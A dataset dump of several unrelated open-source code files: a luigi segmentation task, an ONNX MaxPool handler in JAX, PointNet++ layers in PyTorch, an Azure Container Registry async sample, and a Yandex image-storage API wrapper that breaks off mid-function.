seq_id | text | repo_name | sub_path | file_name | file_ext | file_size_in_byte | program_lang | lang | doc_type | stars | dataset | pt |
---|---|---|---|---|---|---|---|---|---|---|---|---|
650534977
|
#! /bin/python
import os
import sys
import json
from concurrent import futures
import luigi
import numpy as np
import nifty.tools as nt
import elf.segmentation.features as feats
import elf.segmentation.multicut as mc
from vigra.analysis import relabelConsecutive
import cluster_tools.utils.volume_utils as vu
import cluster_tools.utils.function_utils as fu
from cluster_tools.cluster_tasks import SlurmTask, LocalTask, LSFTask
#
# SliceAgglomeration Tasks
#
class SliceAgglomerationBase(luigi.Task):
""" SliceAgglomeration base class
"""
task_name = 'slice_agglomeration'
src_file = os.path.abspath(__file__)
# input and output volumes
input_path = luigi.Parameter()
input_key = luigi.Parameter()
output_path = luigi.Parameter()
output_key = luigi.Parameter()
have_ignore_label = luigi.BoolParameter()
dependency = luigi.TaskParameter()
def requires(self):
return self.dependency
@staticmethod
def default_task_config():
config = LocalTask.default_task_config()
config.update({'beta_stitch': 0.5,
'beta': 0.75,
'invert_inputs': False,
'channel_begin': None,
'channel_end': None})
return config
def clean_up_for_retry(self, block_list):
super().clean_up_for_retry(block_list)
# TODO remove any output of failed blocks because it might be corrupted
def run_impl(self):
# get the global config and init configs
shebang, block_shape, roi_begin, roi_end = self.global_config_values()
self.init(shebang)
# get volume shape and chunks
with vu.file_reader(self.output_path, 'r') as f:
shape = f[self.output_key].shape
chunks = f[self.output_key].chunks
assert len(shape) == 3
# load the slice_agglomeration config
config = self.get_task_config()
# we deal with different block shapes:
# - block_shape: the block shape used for watershed calculation
# - slice_shape: the (2d) shape of a single slice
# - slice_block_shape: the watershed volume chunks in z + full slice shape
slice_shape = shape[1:]
slice_block_shape = (chunks[0],) + slice_shape
# update the config with input and output paths and keys
# as well as block shape
config.update({'input_path': self.input_path, 'input_key': self.input_key,
'output_path': self.output_path, 'output_key': self.output_key,
'block_shape': slice_block_shape, 'have_ignore_label': self.have_ignore_label,
'block_shape_2d': block_shape[1:]})
if self.n_retries == 0:
block_list = vu.blocks_in_volume(shape, slice_block_shape, roi_begin, roi_end)
else:
block_list = self.block_list
self.clean_up_for_retry(block_list)
self._write_log('scheduling %i blocks to be processed' % len(block_list))
n_jobs = min(len(block_list), self.max_jobs)
# prime and run the jobs
self.prepare_jobs(n_jobs, block_list, config)
self.submit_jobs(n_jobs)
# wait till jobs finish and check for job success
self.wait_for_jobs()
self.check_jobs(n_jobs)
class SliceAgglomerationLocal(SliceAgglomerationBase, LocalTask):
"""
SliceAgglomeration on local machine
"""
pass
class SliceAgglomerationSlurm(SliceAgglomerationBase, SlurmTask):
"""
SliceAgglomeration on slurm cluster
"""
pass
class SliceAgglomerationLSF(SliceAgglomerationBase, LSFTask):
"""
SliceAgglomeration on lsf cluster
"""
pass
#
# Implementation
#
def agglomerate_slice(seg, input_, z, config):
    # check if this slice is empty
if np.sum(seg) == 0:
return seg
have_ignore_label = config['have_ignore_label']
block_shape = config['block_shape_2d']
foreground_mask = seg != 0
# relabel the segmentation
_, max_id, _ = relabelConsecutive(seg, out=seg, keep_zeros=True, start_label=1)
seg = seg.astype('uint32')
# construct rag and get edge features
rag = feats.compute_rag(seg, n_labels=max_id + 1, n_threads=1)
edge_features = feats.compute_boundary_mean_and_length(rag, input_, n_threads=1)[:, 0]
# set edges to ignore label to be maximally repulsive
if have_ignore_label:
uv_ids = rag.uvIds()
ignore_mask = (uv_ids == 0).any(axis=1)
edge_features[ignore_mask] = 1
    # get the stitching edges
stitch_edges = feats.get_stitch_edges(rag, seg, block_shape)
beta1 = config.get('beta_stitch', 0.5)
beta2 = config.get('beta', 0.75)
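    # edges that stitch neighboring 2d blocks get the unbiased beta_stitch = 0.5,
    # all remaining in-block edges the boundary-biased beta = 0.75
    # (values read off the task config defaults above)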
costs = np.zeros_like(edge_features)
costs[stitch_edges] = mc.compute_edge_costs(edge_features[stitch_edges], beta=beta1)
costs[~stitch_edges] = mc.compute_edge_costs(edge_features[~stitch_edges], beta=beta2)
node_labels = mc.multicut_kernighan_lin(rag, costs)
node_labels, max_id, _ = relabelConsecutive(node_labels, start_label=1, keep_zeros=True)
# project node labels back to segmentation
seg = feats.project_node_labels_to_pixels(rag, node_labels, n_threads=1).astype('uint64')
# we change to slice base id offset
id_offset = z * np.prod(list(seg.shape))
assert id_offset < np.iinfo('uint64').max, "Id overflow"
# add offset back to segmentation
seg[foreground_mask] += id_offset
return seg
def _slice_agglomeration(blocking, block_id, ds_in, ds_out, config):
fu.log("start processing block %i" % block_id)
n_threads = config['threads_per_job']
ds_in.n_threads = n_threads
ds_out.n_threads = n_threads
invert_inputs = config.get('invert_inputs', False)
bb = vu.block_to_bb(blocking.getBlock(block_id))
# load the segmentation / output
seg = ds_out[bb]
# load the input data
ndim_in = ds_in.ndim
# we are conservative and always accumulate affinities with max
if ndim_in == 4:
channel_begin = config.get('channel_begin', None)
channel_end = config.get('channel_end', None)
channel_begin = 0 if channel_begin is None else channel_begin
channel_end = ds_in.shape[0] if channel_end is None else channel_end
bb_in = (slice(channel_begin, channel_end),) + bb
input_ = ds_in[bb_in]
if invert_inputs:
input_ = 1. - input_
input_ = vu.normalize(np.max(input_, axis=0))
else:
input_ = vu.normalize(ds_in[bb])
if invert_inputs:
input_ = 1. - input_
with futures.ThreadPoolExecutor(n_threads) as tp:
tasks = [tp.submit(agglomerate_slice, seg[z], input_[z], z, config)
for z in range(seg.shape[0])]
slice_segs = [t.result() for t in tasks]
seg = np.concatenate([sseg[None] for sseg in slice_segs], axis=0)
ds_out[bb] = seg
# log block success
fu.log_block_success(block_id)
def slice_agglomeration(job_id, config_path):
fu.log("start processing job %i" % job_id)
fu.log("reading config from %s" % config_path)
with open(config_path, 'r') as f:
config = json.load(f)
    # read the input config
input_path = config['input_path']
input_key = config['input_key']
shape = list(vu.get_shape(input_path, input_key))
if len(shape) == 4:
shape = shape[1:]
block_shape = list(config['block_shape'])
block_list = config['block_list']
# read the output config
output_path = config['output_path']
output_key = config['output_key']
# get the blocking
blocking = nt.blocking([0, 0, 0], shape, block_shape)
# submit blocks
with vu.file_reader(input_path, 'r') as f_in, vu.file_reader(output_path) as f_out:
ds_in = f_in[input_key]
assert ds_in.ndim in (3, 4)
ds_out = f_out[output_key]
assert ds_out.ndim == 3
for block_id in block_list:
_slice_agglomeration(blocking, block_id, ds_in, ds_out, config)
# log success
fu.log_job_success(job_id)
if __name__ == '__main__':
path = sys.argv[1]
assert os.path.exists(path), path
job_id = int(os.path.split(path)[1].split('.')[0].split('_')[-1])
slice_agglomeration(job_id, path)
|
constantinpape/cluster_tools
|
cluster_tools/watershed/slice_agglomeration.py
|
slice_agglomeration.py
|
py
| 8,264 |
python
|
en
|
code
| 32 |
github-code
|
6
|
1293372351
|
import inspect
from functools import partial
import jax.numpy as jnp
from jax import jit, lax
from onnx_jax.handlers.backend_handler import BackendHandler
from onnx_jax.handlers.handler import onnx_op
from onnx_jax.pb_wrapper import OnnxNode
@onnx_op("MaxPool")
class MaxPool(BackendHandler):
@classmethod
def _common(cls, node: OnnxNode, **kwargs):
if len(node.outputs) > 1:
raise Exception('MaxPool with indices is not supported')
cls._rewrite(node)
cls._prepare(node)
return onnx_maxpool
@classmethod
def version_1(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_8(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_10(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_11(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_12(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def _rewrite(cls, node: OnnxNode):
if 'auto_pad' not in node.attrs:
node.attrs['auto_pad'] = 'NOTSET'
if 'ceil_mode' not in node.attrs:
node.attrs['ceil_mode'] = 0
if 'storage_order' not in node.attrs:
node.attrs['storage_order'] = 0
@classmethod
def _prepare(cls, node: OnnxNode):
args = list(inspect.signature(onnx_maxpool).parameters.keys())
attrs = [node.attrs.get(k, None) for k in args[node.len_inputs :]]
node.attrs_list.extend(attrs)
def pad_helper(input_rank, pads=None):
pad_pairs = len(pads) // 2 if pads else 0
pad_width = []
for _ in range(input_rank - pad_pairs):
pad_width.append((0, 0))
for idx in range(pad_pairs):
pad_width.append((pads[idx], pads[idx + pad_pairs]))
return pad_width
@partial(jit, static_argnums=(1, 2, 3, 4, 5, 6, 7))
def onnx_maxpool(
x,
kernel_shape,
pads=None,
strides=None,
dilations=None,
auto_pad='NOTSET',
ceil_mode=0,
storage_order=0,
):
dims = (1,) * (x.ndim - len(kernel_shape)) + tuple(kernel_shape)
strides = (
((1,) * (x.ndim - len(strides)) + tuple(strides)) if strides else (1,) * x.ndim
)
dilations = (
((1,) * (x.ndim - len(dilations)) + tuple(dilations))
if dilations
else (1,) * x.ndim
)
if auto_pad == "NOTSET":
pads = pad_helper(x.ndim, pads) if pads else 'VALID'
elif auto_pad == "SAME_UPPER":
pads = "SAME"
elif auto_pad == "VALID":
pads = "VALID"
elif auto_pad == "SAME_LOWER":
        raise NotImplementedError("MaxPool with auto_pad `SAME_LOWER`")
else:
raise ValueError(f"Invalid auto_pad attribute: {auto_pad}")
return lax.reduce_window(x, -jnp.inf, lax.max, dims, strides, pads, None, dilations)
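# Minimal usage sketch (shapes are illustrative assumptions, not from the source):
# a 1x1x4x4 NCHW input max-pooled with a 2x2 kernel at stride 2 gives a 1x1x2x2 output.
if __name__ == "__main__":
    x = jnp.arange(16.0).reshape(1, 1, 4, 4)
    # positional call: kernel_shape=(2, 2), pads=None (-> 'VALID'), strides=(2, 2)
    y = onnx_maxpool(x, (2, 2), None, (2, 2))
    print(y.shape)  # (1, 1, 2, 2)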
|
gglin001/onnx-jax
|
onnx_jax/handlers/backend/maxpool.py
|
maxpool.py
|
py
| 2,911 |
python
|
en
|
code
| 7 |
github-code
|
6
|
277421218
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from time import time
import numpy as np
from scipy.spatial.transform import Rotation  # needed by npmat2euler below
from pointnet2.lib import pointnet2_utils as pointutils
# import lib.pointnet2_utils as pointutils
def quat2mat(quat):
x, y, z, w = quat[:, 0], quat[:, 1], quat[:, 2], quat[:, 3]
B = quat.size(0)
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
wx, wy, wz = w*x, w*y, w*z
xy, xz, yz = x*y, x*z, y*z
rotMat = torch.stack([w2 + x2 - y2 - z2, 2*xy - 2*wz, 2*wy + 2*xz,
2*wz + 2*xy, w2 - x2 + y2 - z2, 2*yz - 2*wx,
2*xz - 2*wy, 2*wx + 2*yz, w2 - x2 - y2 + z2], dim=1).reshape(B, 3, 3)
return rotMat
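# Sanity sketch (quaternion convention assumed from the indexing above: [x, y, z, w]):
# quat2mat(torch.tensor([[0., 0., 0., 1.]])) returns the 3x3 identity matrix.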
def transform_point_cloud(point_cloud, rotation, translation):
if len(rotation.size()) == 2:
rot_mat = quat2mat(rotation)
else:
rot_mat = rotation
return torch.matmul(rot_mat, point_cloud) + translation.unsqueeze(2)
def npmat2euler(mats, seq='zyx'):
eulers = []
for i in range(mats.shape[0]):
        r = Rotation.from_matrix(mats[i])  # named from_dcm in older scipy versions
eulers.append(r.as_euler(seq, degrees=True))
return np.asarray(eulers, dtype='float32')
def timeit(tag, t):
print("{}: {}s".format(tag, time() - t))
return time()
def pc_normalize(pc):
l = pc.shape[0]
centroid = np.mean(pc, axis=0)
pc = pc - centroid
m = np.max(np.sqrt(np.sum(pc**2, axis=1)))
pc = pc / m
return pc
def square_distance(src, dst):
"""
Calculate Euclid distance between each two points.
src^T * dst = xn * xm + yn * ym + zn * zm;
sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;
sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;
dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2
= sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst
Input:
src: source points, [B, N, C]
dst: target points, [B, M, C]
Output:
dist: per-point square distance, [B, N, M]
"""
B, N, _ = src.shape
_, M, _ = dst.shape
dist = -2 * torch.matmul(src, dst.permute(0, 2, 1))
dist += torch.sum(src ** 2, -1).view(B, N, 1)
dist += torch.sum(dst ** 2, -1).view(B, 1, M)
return dist
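# Quick check sketch (illustrative only): square_distance agrees with squared cdist.
# src = torch.randn(2, 5, 3); dst = torch.randn(2, 7, 3)
# torch.allclose(square_distance(src, dst), torch.cdist(src, dst) ** 2, atol=1e-4)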
def index_points(points, idx):
"""
Input:
points: input points data, [B, N, C]
idx: sample index data, [B, S]
Return:
new_points:, indexed points data, [B, S, C]
"""
device = points.device
B = points.shape[0]
view_shape = list(idx.shape)
view_shape[1:] = [1] * (len(view_shape) - 1)
repeat_shape = list(idx.shape)
repeat_shape[0] = 1
batch_indices = torch.arange(B, dtype=torch.long).to(device).view(view_shape).repeat(repeat_shape)
new_points = points[batch_indices, idx, :]
return new_points
def farthest_point_sample(xyz, npoint):
"""
Input:
xyz: pointcloud data, [B, N, C]
npoint: number of samples
Return:
centroids: sampled pointcloud index, [B, npoint]
"""
device = xyz.device
B, N, C = xyz.shape
centroids = torch.zeros(B, npoint, dtype=torch.long).to(device)
distance = torch.ones(B, N).to(device) * 1e10
farthest = torch.randint(0, N, (B,), dtype=torch.long).to(device)
batch_indices = torch.arange(B, dtype=torch.long).to(device)
for i in range(npoint):
centroids[:, i] = farthest
centroid = xyz[batch_indices, farthest, :].view(B, 1, 3)
dist = torch.sum((xyz - centroid) ** 2, -1)
mask = dist < distance
distance[mask] = dist[mask]
farthest = torch.max(distance, -1)[1]
return centroids
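# Usage sketch (shapes are assumptions for illustration):
# xyz = torch.rand(4, 1024, 3)            # four clouds of 1024 points
# idx = farthest_point_sample(xyz, 128)   # [4, 128] sampled indices
# new_xyz = index_points(xyz, idx)        # [4, 128, 3] sampled coordinates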
def knn_point(k, pos1, pos2):
'''
Input:
k: int32, number of k in k-nn search
pos1: (batch_size, ndataset, c) float32 array, input points
pos2: (batch_size, npoint, c) float32 array, query points
Output:
val: (batch_size, npoint, k) float32 array, L2 distances
idx: (batch_size, npoint, k) int32 array, indices to input points
'''
B, N, C = pos1.shape
M = pos2.shape[1]
pos1 = pos1.view(B,1,N,-1).repeat(1,M,1,1)
pos2 = pos2.view(B,M,1,-1).repeat(1,1,N,1)
dist = torch.sum(-(pos1-pos2)**2,-1)
val,idx = dist.topk(k=k,dim = -1)
return torch.sqrt(-val), idx
def query_ball_point(radius, nsample, xyz, new_xyz):
"""
Input:
radius: local region radius
nsample: max sample number in local region
xyz: all points, [B, N, C]
new_xyz: query points, [B, S, C]
Return:
group_idx: grouped points index, [B, S, nsample]
"""
device = xyz.device
B, N, C = xyz.shape
_, S, _ = new_xyz.shape
group_idx = torch.arange(N, dtype=torch.long).to(device).view(1, 1, N).repeat([B, S, 1])
sqrdists = square_distance(new_xyz, xyz)
group_idx[sqrdists > radius ** 2] = N
mask = group_idx != N
cnt = mask.sum(dim=-1)
group_idx = group_idx.sort(dim=-1)[0][:, :, :nsample]
group_first = group_idx[:, :, 0].view(B, S, 1).repeat([1, 1, nsample])
mask = group_idx == N
group_idx[mask] = group_first[mask]
return group_idx, cnt
def sample_and_group(npoint, radius, nsample, xyz, points, returnfps=False):
"""
Input:
npoint:
radius:
nsample:
xyz: input points position data, [B, N, C]
points: input points data, [B, N, D]
Return:
new_xyz: sampled points position data, [B, 1, C]
new_points: sampled points data, [B, 1, N, C+D]
"""
B, N, C = xyz.shape
S = npoint
fps_idx = farthest_point_sample(xyz, npoint) # [B, npoint, C]
new_xyz = index_points(xyz, fps_idx)
idx, _ = query_ball_point(radius, nsample, xyz, new_xyz)
grouped_xyz = index_points(xyz, idx) # [B, npoint, nsample, C]
grouped_xyz_norm = grouped_xyz - new_xyz.view(B, S, 1, C)
if points is not None:
grouped_points = index_points(points, idx)
new_points = torch.cat([grouped_xyz_norm, grouped_points], dim=-1) # [B, npoint, nsample, C+D]
else:
new_points = grouped_xyz_norm
if returnfps:
return new_xyz, new_points, grouped_xyz, fps_idx
else:
return new_xyz, new_points
def sample_and_group_all(xyz, points):
"""
Input:
xyz: input points position data, [B, N, C]
points: input points data, [B, N, D]
Return:
new_xyz: sampled points position data, [B, 1, C]
new_points: sampled points data, [B, 1, N, C+D]
"""
device = xyz.device
B, N, C = xyz.shape
new_xyz = torch.zeros(B, 1, C).to(device)
grouped_xyz = xyz.view(B, 1, N, C)
if points is not None:
new_points = torch.cat([grouped_xyz, points.view(B, 1, N, -1)], dim=-1)
else:
new_points = grouped_xyz
return new_xyz, new_points
class PointNetSetAbstraction(nn.Module):
def __init__(self, npoint, radius, nsample, in_channel, mlp, mlp2 = [], group_all = False, include_xyz=True,cov_sigma_scale=0.02,aniso_kernel_scale=0.08,use_knn=False, use_aniso_kernel=True):
super(PointNetSetAbstraction, self).__init__()
self.npoint = npoint
self.radius = radius
self.nsample = nsample
self.group_all = group_all
self.mlp_convs = nn.ModuleList()
self.mlp_bns = nn.ModuleList()
self.mlp2_convs = nn.ModuleList()
last_channel = (in_channel+3) if include_xyz else in_channel
for out_channel in mlp:
self.mlp_convs.append(nn.Conv2d(last_channel, out_channel, 1, bias = False))
self.mlp_bns.append(nn.BatchNorm2d(out_channel))
last_channel = out_channel
for out_channel in mlp2:
self.mlp2_convs.append(nn.Sequential(nn.Conv1d(last_channel, out_channel, 1, bias=False),
nn.BatchNorm1d(out_channel)))
last_channel = out_channel
if not use_knn:
self.queryandgroup = pointutils.QueryAndGroup(radius, nsample, use_xyz=include_xyz)
else:
if use_aniso_kernel:
self.queryandgroup =pointutils.AnisoQueryAndGroup(cov_sigma_scale=cov_sigma_scale,aniso_kernel_scale=aniso_kernel_scale, nsample=nsample, use_xyz=include_xyz)
else:
self.queryandgroup =pointutils.IsoQueryAndGroup( nsample=nsample, use_xyz=include_xyz)
# if group_all:
# if use_aniso_kernel:
# self.queryandgroup =pointutils.AnisoQueryAndGroup(cov_sigma_scale=cov_sigma_scale,aniso_kernel_scale=aniso_kernel_scale, nsample=nsample, use_xyz=include_xyz)
# else:
# self.queryandgroup = pointutils.QueryAndGroup(radius, nsample,use_xyz=include_xyz)
# #self.queryandgroup = pointutils.GroupAll(use_xyz=include_xyz)
# else:
# self.queryandgroup = pointutils.QueryAndGroup(radius, nsample,use_xyz=include_xyz)
def forward(self, xyz, points):
"""
Input:
xyz: input points position data, [B, C, N]
points: input points data, [B, D, N]
Return:
new_xyz: sampled points position data, [B, S, C]
new_points_concat: sample points feature data, [B, S, D']
"""
device = xyz.device
B, C, N = xyz.shape
xyz_t = xyz.permute(0, 2, 1).contiguous()
# if points is not None:
# points = points.permute(0, 2, 1).contiguous()
        # pick the neighborhood points
if self.group_all == False:
fps_idx = pointutils.furthest_point_sample(xyz_t, self.npoint) # [B, N]
new_xyz = pointutils.gather_operation(xyz, fps_idx) # [B, C, N]
else:
new_xyz = xyz
new_points = self.queryandgroup(xyz_t, new_xyz.transpose(2, 1).contiguous(), points) # [B, 3+C, N, S]
# new_xyz: sampled points position data, [B, C, npoint]
# new_points: sampled points data, [B, C+D, npoint, nsample]
for i, conv in enumerate(self.mlp_convs):
bn = self.mlp_bns[i]
new_points = F.relu(bn(conv(new_points)))
new_points = torch.max(new_points, -1)[0]
for i, conv in enumerate(self.mlp2_convs):
new_points = F.relu(conv(new_points))
return new_xyz, new_points, fps_idx if not self.group_all else None
class FlowEmbedding(nn.Module):
def __init__(self, radius, nsample, in_channel, mlp, pooling='max', corr_func='concat', knn = True):
super(FlowEmbedding, self).__init__()
self.radius = radius
self.nsample = nsample
self.knn = knn
self.pooling = pooling
self.corr_func = corr_func
self.mlp_convs = nn.ModuleList()
self.mlp_bns = nn.ModuleList()
        if corr_func == 'concat':  # was `is 'concat'`, an identity test, not equality
last_channel = in_channel*2+3
for out_channel in mlp:
self.mlp_convs.append(nn.Conv2d(last_channel, out_channel, 1, bias=False))
self.mlp_bns.append(nn.BatchNorm2d(out_channel))
last_channel = out_channel
def forward(self, pos1, pos2, feature1, feature2):
"""
Input:
xyz1: (batch_size, 3, npoint)
xyz2: (batch_size, 3, npoint)
feat1: (batch_size, channel, npoint)
feat2: (batch_size, channel, npoint)
Output:
xyz1: (batch_size, 3, npoint)
feat1_new: (batch_size, mlp[-1], npoint)
"""
pos1_t = pos1.permute(0, 2, 1).contiguous()
pos2_t = pos2.permute(0, 2, 1).contiguous()
B, N, C = pos1_t.shape
if self.knn:
_, idx = pointutils.knn(self.nsample, pos1_t, pos2_t)
else:
            # if there are fewer ball-neighborhood points than nsample,
            # then fall back to the knn neighborhood points
idx, cnt = query_ball_point(self.radius, self.nsample, pos2_t, pos1_t)
            # use knn to take the nearest points
_, idx_knn = pointutils.knn(self.nsample, pos1_t, pos2_t)
cnt = cnt.view(B, -1, 1).repeat(1, 1, self.nsample)
idx = idx_knn[cnt > (self.nsample-1)]
pos2_grouped = pointutils.grouping_operation(pos2, idx) # [B, 3, N, S]
pos_diff = pos2_grouped - pos1.view(B, -1, N, 1) # [B, 3, N, S]
feat2_grouped = pointutils.grouping_operation(feature2, idx) # [B, C, N, S]
if self.corr_func=='concat':
feat_diff = torch.cat([feat2_grouped, feature1.view(B, -1, N, 1).repeat(1, 1, 1, self.nsample)], dim = 1)
feat1_new = torch.cat([pos_diff, feat_diff], dim = 1) # [B, 2*C+3,N,S]
for i, conv in enumerate(self.mlp_convs):
bn = self.mlp_bns[i]
feat1_new = F.relu(bn(conv(feat1_new)))
feat1_new = torch.max(feat1_new, -1)[0] # [B, mlp[-1], npoint]
return pos1, feat1_new
class PointNetSetUpConv(nn.Module):
def __init__(self, nsample, radius, f1_channel, f2_channel, mlp, mlp2, knn = True):
super(PointNetSetUpConv, self).__init__()
self.nsample = nsample
self.radius = radius
self.knn = knn
self.mlp1_convs = nn.ModuleList()
self.mlp2_convs = nn.ModuleList()
last_channel = f2_channel+3
for out_channel in mlp:
self.mlp1_convs.append(nn.Sequential(nn.Conv2d(last_channel, out_channel, 1, bias=False),
nn.BatchNorm2d(out_channel),
nn.ReLU(inplace=False)))
last_channel = out_channel
        if len(mlp) != 0:
last_channel = mlp[-1] + f1_channel
else:
last_channel = last_channel + f1_channel
for out_channel in mlp2:
self.mlp2_convs.append(nn.Sequential(nn.Conv1d(last_channel, out_channel, 1, bias=False),
nn.BatchNorm1d(out_channel),
nn.ReLU(inplace=False)))
last_channel = out_channel
def forward(self, pos1, pos2, feature1, feature2):
"""
Feature propagation from xyz2 (less points) to xyz1 (more points)
Inputs:
xyz1: (batch_size, 3, npoint1)
xyz2: (batch_size, 3, npoint2)
feat1: (batch_size, channel1, npoint1) features for xyz1 points (earlier layers, more points)
feat2: (batch_size, channel1, npoint2) features for xyz2 points
Output:
feat1_new: (batch_size, npoint2, mlp[-1] or mlp2[-1] or channel1+3)
TODO: Add support for skip links. Study how delta(XYZ) plays a role in feature updating.
"""
pos1_t = pos1.permute(0, 2, 1).contiguous()
pos2_t = pos2.permute(0, 2, 1).contiguous()
B,C,N = pos1.shape
if self.knn:
_, idx = pointutils.knn(self.nsample, pos1_t, pos2_t)
else:
idx, _ = query_ball_point(self.radius, self.nsample, pos2_t, pos1_t)
pos2_grouped = pointutils.grouping_operation(pos2, idx)
pos_diff = pos2_grouped - pos1.view(B, -1, N, 1) # [B,3,N1,S]
feat2_grouped = pointutils.grouping_operation(feature2, idx)
feat_new = torch.cat([feat2_grouped, pos_diff], dim = 1) # [B,C1+3,N1,S]
for conv in self.mlp1_convs:
feat_new = conv(feat_new)
# max pooling
feat_new = feat_new.max(-1)[0] # [B,mlp1[-1],N1]
# concatenate feature in early layer
if feature1 is not None:
feat_new = torch.cat([feat_new, feature1], dim=1)
# feat_new = feat_new.view(B,-1,N,1)
for conv in self.mlp2_convs:
feat_new = conv(feat_new)
return feat_new
class PointNetFeaturePropogation(nn.Module):
def __init__(self, in_channel, mlp):
super(PointNetFeaturePropogation, self).__init__()
self.mlp_convs = nn.ModuleList()
self.mlp_bns = nn.ModuleList()
last_channel = in_channel
for out_channel in mlp:
self.mlp_convs.append(nn.Conv1d(last_channel, out_channel, 1))
self.mlp_bns.append(nn.BatchNorm1d(out_channel))
last_channel = out_channel
def forward(self, pos1, pos2, feature1, feature2):
"""
Input:
xyz1: input points position data, [B, C, N]
xyz2: sampled input points position data, [B, C, S]
points1: input points data, [B, D, N]
points2: input points data, [B, D, S]
Return:
new_points: upsampled points data, [B, D', N]
"""
pos1_t = pos1.permute(0, 2, 1).contiguous()
pos2_t = pos2.permute(0, 2, 1).contiguous()
B, C, N = pos1.shape
# dists = square_distance(pos1, pos2)
# dists, idx = dists.sort(dim=-1)
# dists, idx = dists[:, :, :3], idx[:, :, :3] # [B, N, 3]
dists,idx = pointutils.three_nn(pos1_t,pos2_t)
dists[dists < 1e-10] = 1e-10
weight = 1.0 / dists
weight = weight / torch.sum(weight, -1,keepdim = True) # [B,N,3]
interpolated_feat = torch.sum(pointutils.grouping_operation(feature2, idx) * weight.view(B, 1, N, 3), dim = -1) # [B,C,N,3]
if feature1 is not None:
feat_new = torch.cat([interpolated_feat, feature1], 1)
else:
feat_new = interpolated_feat
for i, conv in enumerate(self.mlp_convs):
bn = self.mlp_bns[i]
feat_new = F.relu(bn(conv(feat_new)))
return feat_new
|
uncbiag/shapmagn
|
pointnet2/util.py
|
util.py
|
py
| 17,400 |
python
|
en
|
code
| 94 |
github-code
|
6
|
24199755237
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 5 16:12:19 2019
@author: Administrator
"""
import copy
class Solution:
def permuteUnique(self, nums):
self.__res = []
if not nums:
return self.__res
nums.sort()
self.__used = [False for _ in range(len(nums))]
self.__generate_permutation(nums, 0, [])
return self.__res
def __generate_permutation(self, nums, index, p):
if index == len(nums):
self.__res.append(copy.copy(p))
return
for i in range(len(nums)):
if self.__used[i]:
continue
            # skip duplicates: among equal values, only the first unused
            # occurrence may be extended at this depth
            if i != 0 and nums[i] == nums[i - 1] and not self.__used[i - 1]:
continue
p.append(nums[i])
self.__used[i] = True
self.__generate_permutation(nums, index + 1, p)
p.pop()
self.__used[i] = False
if __name__ == '__main__':
nums = [1, 2, 1]
res = Solution().permuteUnique(nums)
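    # print the result for inspection (expected for nums = [1, 2, 1]):
    print(res)  # [[1, 1, 2], [1, 2, 1], [2, 1, 1]]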
|
AiZhanghan/Leetcode
|
code/47. Permutations II.py
|
47. Permutations II.py
|
py
| 1,095 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28181321143
|
import asyncio
from dotenv import find_dotenv, load_dotenv
import os
class CreateClients(object):
def __init__(self):
load_dotenv(find_dotenv())
self.account_url = os.environ["CONTAINERREGISTRY_ENDPOINT"]
async def create_registry_client(self):
# Instantiate the ContainerRegistryClient
# [START create_registry_client]
from azure.containerregistry.aio import ContainerRegistryClient
from azure.identity.aio import DefaultAzureCredential
client = ContainerRegistryClient(self.account_url, DefaultAzureCredential())
# [END create_registry_client]
async def create_repository_client(self):
# Instantiate the ContainerRegistryClient
# [START create_repository_client]
from azure.containerregistry.aio import ContainerRepository
from azure.identity.aio import DefaultAzureCredential
client = ContainerRepository(self.account_url, "my_repository", DefaultAzureCredential())
# [END create_repository_client]
async def basic_sample(self):
from azure.containerregistry.aio import ContainerRegistryClient
from azure.identity.aio import DefaultAzureCredential
# Instantiate the client
client = ContainerRegistryClient(self.account_url, DefaultAzureCredential())
async with client:
# Iterate through all the repositories
async for repository_name in client.list_repository_names():
if repository_name == "hello-world":
# Create a repository client from the registry client
repository_client = client.get_repository(repository_name)
async with repository_client:
# Show all tags
async for tag in repository_client.list_tags():
print(tag.digest)
# [START delete_repository]
await client.delete_repository("hello-world")
# [END delete_repository]
async def main():
sample = CreateClients()
await sample.create_registry_client()
await sample.create_repository_client()
await sample.basic_sample()
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
|
teaglebuilt/azure-sdk-for-python
|
sdk/containerregistry/azure-containerregistry/samples/async_samples/sample_create_client_async.py
|
sample_create_client_async.py
|
py
| 2,315 |
python
|
en
|
code
| null |
github-code
|
6
|
75136482107
|
import attr
import requests
from typing import Dict, List, Optional
@attr.s
class Image:
id: str = attr.ib()
size: int = attr.ib()
createdAt: str = attr.ib()
origUrl: Optional[str] = attr.ib(default=None)
class YandexImageAPI:
"""
This class is a wrapper around Yandex image storage API.
Its official documentation is available online:
https://yandex.ru/dev/dialogs/alice/doc/resource-upload-docpage/
"""
def __init__(self, token, skill_id, default_image_id=None, upload_just_in_time=False):
self.token = token
self.skill_id = skill_id
self.default_image_id = default_image_id
self.upload_just_in_time = upload_just_in_time
self.url2image: Dict[str, Image] = {}
self.id2image: Dict[str, Image] = {}
def update_images(self) -> None:
""" Retrieve the list of images from the cloud storage and save it to the local index. """
for image in self.get_images_list():
if image.origUrl:
self.url2image[image.origUrl] = image
self.id2image[image.id] = image
def add_image(self, url, timeout=5) -> Optional[Image]:
""" Add image to the local index and Yandex storage by its url."""
if url in self.url2image:
return self.url2image[url]
result = self.upload_image(url, timeout=timeout)
if result:
self.url2image[url] = result
self.id2image[result.id] = result
return result
def upload_image(self, url, timeout=5) -> Optional[Image]:
"""
        Try to upload the image by url (without adding it to the local index);
        small images take 1.5-2 seconds to upload.
"""
r = requests.post(
url='https://dialogs.yandex.net/api/v1/skills/{}/images'.format(self.skill_id),
headers={'Authorization': 'OAuth {}'.format(self.token)},
json={'url': url},
timeout=timeout,
)
result = r.json().get('image')
if result:
return Image(**result)
def get_images_list(self) -> List[Image]:
""" Get all images in the Yandex storage. """
r = requests.get(
url='https://dialogs.yandex.net/api/v1/skills/{}/images'.format(self.skill_id),
headers={'Authorization': 'OAuth {}'.format(self.token)}
)
